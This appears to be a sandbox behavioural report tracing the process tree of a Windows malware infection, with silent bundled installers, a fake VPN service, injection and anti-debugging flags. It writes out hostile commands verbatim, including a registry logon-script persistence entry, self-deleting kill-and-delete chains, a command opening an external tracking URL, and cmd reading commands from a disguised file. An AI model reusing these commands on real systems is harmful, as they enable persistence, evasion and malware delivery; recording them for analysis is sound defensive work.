- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1268

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
8⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2636

C:\Users\Admin\AppData\Local\Temp\chuc3tyq4cm\app.exe
"C:\Users\Admin\AppData\Local\Temp\chuc3tyq4cm\app.exe" /8-23
6⤵
- Executes dropped EXE
PID:188

C:\Users\Admin\AppData\Local\Temp\chuc3tyq4cm\app.exe
"C:\Users\Admin\AppData\Local\Temp\chuc3tyq4cm\app.exe" /8-23
7⤵
PID:388

C:\Users\Admin\AppData\Local\Temp\rmukerfvz0l\IBInstaller_97039.exe
"C:\Users\Admin\AppData\Local\Temp\rmukerfvz0l\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
6⤵
- Executes dropped EXE
PID:6088

C:\Users\Admin\AppData\Local\Temp\is-40MML.tmp\IBInstaller_97039.tmp
"C:\Users\Admin\AppData\Local\Temp\is-40MML.tmp\IBInstaller_97039.tmp" /SL5="$104AE,14575459,721408,C:\Users\Admin\AppData\Local\Temp\rmukerfvz0l\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
7⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:6200

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c start http://egypthistoricart.online/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039^&param=
8⤵
PID:2404

C:\ProgramData\regid.1993-06.com.microsoft\client32.exe
"C:\ProgramData\regid.1993-06.com.microsoft\client32.exe"
8⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Checks computer location settings
- Checks processor information in registry
- Enumerates system info in registry
PID:8268

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\client32.exe" /f
8⤵
PID:7188

C:\Users\Admin\AppData\Local\Temp\is-VP44P.tmp\{app}\chrome_proxy.exe
"C:\Users\Admin\AppData\Local\Temp\is-VP44P.tmp\{app}\chrome_proxy.exe"
8⤵
PID:7776

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-VP44P.tmp\{app}\chrome_proxy.exe"
9⤵
PID:9528

C:\Windows\SysWOW64\PING.EXE
ping localhost -n 4
10⤵
- Runs ping.exe
PID:7528

C:\Users\Admin\AppData\Local\Temp\fo314ammogh\vict.exe
"C:\Users\Admin\AppData\Local\Temp\fo314ammogh\vict.exe" /VERYSILENT /id=535
6⤵
- Executes dropped EXE
PID:5836

C:\Users\Admin\AppData\Local\Temp\u1dcgquixlx\nrl0jkg334t.exe
"C:\Users\Admin\AppData\Local\Temp\u1dcgquixlx\nrl0jkg334t.exe" /quiet SILENT=1 AF=756
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:1000

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\u1dcgquixlx\nrl0jkg334t.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\u1dcgquixlx\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617314532 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"
7⤵
PID:7248

C:\Users\Admin\AppData\Local\Temp\SFEZK230XC\setups.exe
"C:\Users\Admin\AppData\Local\Temp\SFEZK230XC\setups.exe" ll
3⤵
- Executes dropped EXE
PID:5020

C:\Users\Admin\AppData\Local\Temp\is-JTU35.tmp\setups.tmp
"C:\Users\Admin\AppData\Local\Temp\is-JTU35.tmp\setups.tmp" /SL5="$501B2,454998,229376,C:\Users\Admin\AppData\Local\Temp\SFEZK230XC\setups.exe" ll
4⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:4228

C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\loli.exe
"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\loli.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:740

C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\loli.exe
"{path}"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:6696

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im loli.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\loli.exe" & del C:\ProgramData\*.dll & exit
4⤵
PID:648

C:\Windows\SysWOW64\taskkill.exe
taskkill /im loli.exe /f
5⤵
- Kills process with taskkill
PID:192

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
5⤵
- Delays execution with timeout.exe
PID:7808

C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe
"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2648

C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe
"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"
3⤵
- System policy modification
PID:5796

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Remove.bat" 5796 C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"
4⤵
PID:4724

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /PID 5796
5⤵
- Kills process with taskkill
PID:4268

C:\Windows\SysWOW64\choice.exe
choice /C Y /N /D Y /T 3
5⤵
PID:6292

C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe
"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2976

C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe
"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"
2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:184

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s BITS
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3632

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
PID:4780

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:4148

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
2⤵
- Loads dropped DLL
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4672

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2276

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:4152

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5560

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
PID:5176

C:\Users\Admin\AppData\Local\Temp\is-41RMI.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-41RMI.tmp\vict.tmp" /SL5="$20366,870426,780800,C:\Users\Admin\AppData\Local\Temp\fo314ammogh\vict.exe" /VERYSILENT /id=535
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:1720

C:\Users\Admin\AppData\Local\Temp\is-8P6LI.tmp\win1host.exe
"C:\Users\Admin\AppData\Local\Temp\is-8P6LI.tmp\win1host.exe" 535
2⤵
- Executes dropped EXE
PID:6752

C:\Users\Admin\AppData\Local\Temp\EAuLKqWeY.exe
"C:\Users\Admin\AppData\Local\Temp\EAuLKqWeY.exe"
3⤵
PID:5556

C:\Windows\SysWOW64\at.exe
"C:\Windows\System32\at.exe"
4⤵
PID:7232

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Marito.gif
4⤵
PID:7512

C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe
5⤵
PID:4584

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6752 -s 1032
3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:8256

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:5528

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:6688

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-VP44P.tmp\{app}\microsoft.cab -F:* %ProgramData%
1⤵
PID:6804

C:\Windows\SysWOW64\expand.exe
expand C:\Users\Admin\AppData\Local\Temp\is-VP44P.tmp\{app}\microsoft.cab -F:* C:\ProgramData
2⤵
- Drops file in Windows directory
PID:5508

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6828

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
PID:6516

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 6091C4E6E138FD8F367E8FA4C15AEB28 C
2⤵
- Loads dropped DLL
PID:2792

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding A19662A9BF453AF517C64DF92FA1A2A4
2⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:8104

C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"
2⤵
PID:8656

C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=756 -BF=default -uncf=default
3⤵
PID:8788

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--anbfs"
4⤵
PID:9388

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x1e0,0x1e4,0x1e8,0x1c0,0x1ec,0x7ffb57039ec0,0x7ffb57039ed0,0x7ffb57039ee0
5⤵
PID:9476

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1568,1629436623196631266,759016417968160368,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9388_316199920" --mojo-platform-channel-handle=1700 /prefetch:8
5⤵
PID:4772

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1568,1629436623196631266,759016417968160368,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9388_316199920" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1628 /prefetch:2
5⤵
PID:4124

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Weather\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1568,1629436623196631266,759016417968160368,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9388_316199920" --nwjs --extension-process --enable-auto-reload --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2464 /prefetch:1
5⤵
PID:9160

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1568,1629436623196631266,759016417968160368,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9388_316199920" --mojo-platform-channel-handle=2192 /prefetch:8
5⤵
PID:6716

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1568,1629436623196631266,759016417968160368,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9388_316199920" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=1816 /prefetch:2
5⤵
PID:8100

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1568,1629436623196631266,759016417968160368,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9388_316199920" --mojo-platform-channel-handle=3116 /prefetch:8
5⤵
PID:9464

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1568,1629436623196631266,759016417968160368,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9388_316199920" --mojo-platform-channel-handle=3492 /prefetch:8
5⤵
PID:356

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1568,1629436623196631266,759016417968160368,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9388_316199920" --mojo-platform-channel-handle=3164 /prefetch:8
5⤵
PID:4712

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1568,1629436623196631266,759016417968160368,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9388_316199920" --mojo-platform-channel-handle=3388 /prefetch:8
5⤵
PID:10196

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1568,1629436623196631266,759016417968160368,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9388_316199920" --mojo-platform-channel-handle=3172 /prefetch:8
5⤵
PID:8936

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1568,1629436623196631266,759016417968160368,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9388_316199920" --mojo-platform-channel-handle=2480 /prefetch:8
5⤵
PID:5412

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1568,1629436623196631266,759016417968160368,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9388_316199920" --mojo-platform-channel-handle=2880 /prefetch:8
5⤵
PID:1028

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1568,1629436623196631266,759016417968160368,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9388_316199920" --mojo-platform-channel-handle=828 /prefetch:8
5⤵
PID:7852

C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1568,1629436623196631266,759016417968160368,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9388_316199920" --mojo-platform-channel-handle=2472 /prefetch:8
5⤵
PID:5588

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXEEF84.bat" "
3⤵
PID:3068

C:\Windows\SysWOW64\attrib.exe
C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1"
4⤵
- Views/modifies file attributes
PID:7272

C:\Windows\SysWOW64\timeout.exe
C:\Windows\System32\timeout.exe 5
4⤵
- Delays execution with timeout.exe
PID:3756

C:\Windows\SysWOW64\timeout.exe
C:\Windows\System32\timeout.exe 5
4⤵
- Delays execution with timeout.exe
PID:8524

C:\Windows\SysWOW64\attrib.exe
C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXEEF84.bat"
4⤵
- Views/modifies file attributes
PID:6468

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXEEF84.bat" "
4⤵
PID:2344

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" cls"
4⤵
PID:6452

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXEEEA8.bat" "
3⤵
PID:7252

C:\Windows\SysWOW64\attrib.exe
C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1\AIPACK~1.EXE"
4⤵
- Views/modifies file attributes
PID:6712

C:\Windows\SysWOW64\timeout.exe
C:\Windows\System32\timeout.exe 5
4⤵
- Delays execution with timeout.exe
PID:7484

C:\Windows\SysWOW64\attrib.exe
C:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXEEEA8.bat"
4⤵
- Views/modifies file attributes
PID:4888

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXEEEA8.bat" "
4⤵
PID:6044

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" cls"
4⤵
PID:8480

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:5476

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6236

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:7176

C:\Windows\system32\DrvInst.exe
DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{039e4ca7-990b-0f42-82bd-c20401777d16}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"
2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:7324

C:\Windows\system32\DrvInst.exe
DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000174"
2⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:7680

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
- Checks SCSI registry key(s)
PID:7788

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
1⤵
PID:7780

C:\Users\Admin\AppData\Local\Temp\804C.exe
C:\Users\Admin\AppData\Local\Temp\804C.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4964

C:\Users\Admin\AppData\Local\Temp\8484.exe
C:\Users\Admin\AppData\Local\Temp\8484.exe
1⤵
- Suspicious use of SetWindowsHookEx
PID:7928

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
1⤵
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies data under HKEY_USERS
PID:7728

C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
MaskVPNUpdate.exe /silent
2⤵
- Suspicious use of SetWindowsHookEx
PID:8412

C:\Users\Admin\AppData\Local\Temp\90E8.exe
C:\Users\Admin\AppData\Local\Temp\90E8.exe
1⤵
- Loads dropped DLL
PID:8004

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\90E8.exe"
2⤵
PID:5096

C:\Windows\SysWOW64\timeout.exe
timeout /T 10 /NOBREAK
3⤵
- Delays execution with timeout.exe
PID:5800

C:\Users\Admin\AppData\Local\Temp\9D0F.exe
C:\Users\Admin\AppData\Local\Temp\9D0F.exe
1⤵
PID:4008

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:4880

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6092

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4756

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:5536

C:\Users\Admin\AppData\Local\Temp\E36F.exe
C:\Users\Admin\AppData\Local\Temp\E36F.exe
1⤵
- Suspicious use of SetThreadContext
PID:5328

C:\Users\Admin\AppData\Local\Temp\E36F.exe
"{path}"
2⤵
PID:8876

C:\Users\Admin\AppData\Local\Temp\E36F.exe
"{path}"
2⤵
PID:8920

C:\Users\Admin\AppData\Local\Temp\ED54.exe
C:\Users\Admin\AppData\Local\Temp\ED54.exe
1⤵
PID:5696

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:5428

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:5844

C:\Windows\SysWOW64\explorer.exe
